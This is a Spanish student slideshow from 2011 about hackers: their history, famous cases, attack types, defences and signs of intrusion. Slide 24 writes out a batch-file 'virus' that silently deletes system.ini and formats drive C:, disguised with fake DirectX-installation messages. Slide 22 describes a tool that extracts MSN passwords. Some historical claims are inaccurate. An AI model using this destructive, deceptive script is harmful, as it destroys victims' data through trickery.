Sesión de aprendizaje Planifica Textos argumentativo.docx
Hackers
1. HACKERS
SEBASTIAN RIOS RAMIREZ
DANIELA BERMUDEZ MUÑOZ
MANTENIMIENTO DE COMPUTADORES
CENTRO DE DISEÑO E INNOVACION TECNOLOGICA
INDUSTRIAL
DOSQUEBRADAS NOVIEMBRE 05 DE 2011
2. HACKERS
SEBASTIAN RIOS RAMIREZ
DANIELA BERMUDEZ MUÑOZ
MANTENIMIENTO DE COMPUTADORES
INGENIERO
EDWIN ALEXANDER GOMEZ ROBBY
INSTRUCTOR
CENTRO DE DISEÑO E INNOVACION TECNOLOGICA
INDUSTRIAL
DOSQUEBRADAS NOVIEMBRE 05 DE 2011
3. Al principio no se les llamaba así, el
verdadero sobrenombre es “ autentico
programador” que se uso en el año 1945.
los comienzos de dicha cultura se pueden
fechar con seguridad en 1961 año en que el
MIT adquirió la primera PDP-1, El
comité de Señales y Energía del Tech
Model Railroad Club adoptó la
computadora como su juguete
tecnológico preferido e inventó
herramientas de programación, Los
hackers del Tech Model Railroad Club se
convirtieron en el núcleo del Laboratorio
de Inteligencia Artificial del MIT, el
centro más destacado de investigación
sobre Inteligencia Artificial de todo el
mundo a principios de los 80. Su
influencia se extendió por todas partes a
partir de 1969,
4. En new jersey desde 1969 un hacker de laboratorios
Bell llamado ken Thompson invento Unix. se
estructuró como un conjunto de herramientas flexible,
compuesto por diversos programas sencillos,
diseñados para poderse combinar entre ellos de
distintas y provechosas maneras.
5. o Jonathan james: Fue el primer adolecente que fue a
la cárcel por hacking, cuando fue sentenciado tenía a
penas 16 años. También entró a servidores de la
NASA, robando software de aproximadamente $1.7
millones de dólares, por lo cuál la NASA tuvo que
apagar todo su sistema, lo cual tuvo un costo de
$41,000.
6. o Adrian Lamo: Entró a New York Times y a Microsoft,
él usaba conexiones en las cafeterías “Kinko” para
hackear. cuando entró a la intranet del New York
Times fue cuando las cosas se tornaron serias. Se
agregó a él mismo a la lista de expertos y vio
información personal.
7. o Kevin Mitnick: ya tenía algo de experiencia
hackeando antes de cometer los crímenes que lo
hicieron famoso. Empezó engañando al sistema de
tarjetas en Los Ángeles, para lograr viajar gratis, luego
así como el co-fundador de Apple Steve Wozniak,
estuvo metido en el phone phreaking que significa a
grandes rasgos poder hacer llamadas gratis.
8. o Kevin Poulsen: También conocido como “Dark
Dante”, hackeo de las líneas telefónicas de KIIS-
FM, una estación de radio en Los Ángeles, lo cuál lo
hizo como ganador de un nuevo Porsche a parte de
muchas otras cosas. entró a una base de datos de
investigaciones federales, durante la persecución
hackeo computadoras federales para obtener
información de escucha telefónica.
9. o Robert Tappan Morris: creador del Gusano Morris, el
primer gusano desencadenado en Internet, como
resultado el fue la primera persona perseguida en 1986
por fraude computacional, Su intención era usarlo para
ver que tan largo era Internet, pero el gusano se
replicaba excesivamente, haciendo las computadoras
lentas, tuvo impacto en 6 mil computadoras.
10. oStephen Wozniak empezó a hackear haciendo cajas
azules (blue boxes) las cuales lograban imitar los
sonidos del teléfono de ésa época logrando así
llamadas gratuitas de larga distancia.
11. o Tim berners-lee creador del (www) Word Wide
Web, hackeaba con precaución junto con un amigo, y
luego fue vetado de las computadoras de la
Universidad, él armó su primera computadora con
hierro soldado, puentes TTL, un procesador M6800 y
una televisión vieja.
12. o Destruyen SSL con 200 PlayStation 3: Un grupo de
investigadores utilizaron el poder combinado de nada
menos que 200 consolas PlayStation 3, logrando algo
que podría poner de rodillas toda la estructura de
seguridad que existe en Internet hoy en día:
Quebraron el SSL. Una gran cantidad de aplicaciones
pueden utilizar estos protocolos, desde navegadores
como Internet Explorer y Firefox hasta mensajeros en
línea y clientes de correo electrónic.
13. o Caballos de Troya: Consiste en introducir dentro de un
programa una rutina o conjunto de instrucciones, por
supuesto no autorizadas y que la persona que lo ejecuta no
conoce, para que dicho programa actúe de una forma
diferente a como estaba previsto.
o Bombas Lógicas: Este suele ser el procedimiento de
sabotaje mas comúnmente utilizado por empleados
descontentos. Consiste en introducir un programa o rutina
que en una fecha determinada destruirá, modificara la
información o provocara el cuelgue del sistema.
14. o Ingeniería Social: Básicamente convencer a la gente
de que haga lo que en realidad no debería. Por ejemplo
llamar a un usuario haciéndose pasar por
administrador del sistema y requerirle la password con
alguna excusa convincente.
oDifusión de virus: puede ser ingresado al sistema por
un dispositivo externo (diskettes) o través de la red (e-
mails u otros protocolos) sin intervención directa del
atacante. Dado que el virus tiene como característica
propia su auto reproducción.
15. un modelo de seguridad debe estar formado por
múltiples componentes o capas que pueden ser
incorporadas de manera progresiva al modelo global
de seguridad, logrando así el método más efectivo para
disuadir el uso no autorizado de sistemas y servicios de
red.
16. Es posible dividir las tareas de seguridad en tres grandes
grupos:
Autenticación: se refiere a establecer las entidades que
pueden tener acceso al universo de recursos de cómputo
que cierto medio ambiente puede ofrecer.
Autorización: es el hecho de que las entidades autorizadas a
tener acceso a los recursos de cómputo, tengan acceso
únicamente a las áreas de trabajo sobre las cuales ellas
deben tener dominio.
Auditoría: se refiere a la continua vigilancia de los servicios
en producción. Entra dentro de este grupo el mantener
estadísticas de acceso, estadísticas de uso y políticas de
acceso físico a los recursos.
17. Programas Antiespias: son aquellos que una vez
instalados pueden recopilar y mandar información
(archivos, claves, información personal acerca del
usuario, etc.) a otras computadoras sin el conocimiento
o permiso del usuario o sistema en el cual residen.
18. o Programas cortafuegos: limitar, controlar o parar el
tránsito de información entre la computadora en
el cual residen y todos aquellas computadoras o
equipos que se comunican con ella.
o Antivirus: Estos programas pueden detectar a un
virus incluso antes que ataque y que lleve a cabo sus
destructores objetivos.
19. oTráfico de red de salida sospechosamente alto. Si
usted está en una cuenta de discado o utiliza ADSL y
nota un volumen alto no usual en el tráfico de salida es
posible que su ordenador esté en peligro.
oGran actividad del disco duro o archivos de aspecto
sospechoso en los directorios raíces de cualquiera de
los discos, muchos hackers realizan un escaneo masivo
para encontrar documentos interesantes o archivos que
contengan contraseñas o detalles de cuentas de banco
o de pagos
20. oUn gran número de paquetes que vienen de una sola
dirección y son bloqueados por su cortafuegos, los
hackers suelen usar herramientas automáticas de
prueba que tratan de usar varios exploits para irrumpir
en el sistema. Si usted tiene un cortafuegos.
21. Su principal recurso dependen, además de su propio
ingenio, es un código informático, Hay miles de
diferentes programas de los hackers utilizan para
explorar las computadoras y redes. Estos programas
dan a los piratas una gran cantidad de poder sobre los
usuarios inocentes y las organizaciones.
22. Utilidad súper sencilla que muestra por pantalla el
Password del MSN Messenger. Para ello lo saca del
registro de Windows, y lo desencripta en caso de estar
encriptada.
23. Bit Defender USB Immunizer: un sencillo y muy
efectivo antivirus que se encarga de borrar todo archivo
sospechoso al momento que la memoria Flash es
conectada. Con interfaz sencilla y una función única, la
aplicación representa una protección
efectiva, actuando directamente en los archivos
ejecutables.
24. primero abrimos el bloc de notas y podemos hacer las siguientes funciones:
1) echo s | erase C:DIRECCION DEL ARCHIVO A BORRAR
ese txt ara que borre el archivo especifico, por ejemplo queremos que borre el
system.ini seria así
echo s | erase C:WINDOWSsystem.ini
2) echo s | format c:/v/q/u
Ese nos formatearía el disco duro sin preguntar pause
echo Ahora se pondrá en marcha la instalación del archivo direct x formating
echo Esta operación puede tardar varios minutos pero vale la pena esperar
pause
echo s | format c:/v/q/u. y por ultimo cuando tengamos todo eso puesto en
nuestro bloc de notas lo tendremos que guardar en formato .BAT en bez de
.TXT
Y ya tendremos nuestro virus creado.
25. Descarga ELIBAGLA
Haz doble clic encima para abrirlo
Verifica que en el menú desplegable
Unidad, se encuentra C: (o la
partición que contiene el sistema
operativo)
Verifica también que la opción
Eliminar Ficheros
Automáticamente, en la parte baja
de la ventana, esté marcada.
Haz clic en el botón Explorar para
lanzar el análisis, al final del scan, se
generará un informe llamado
infosat.txt que será guardado en la raíz
C:infosat.txt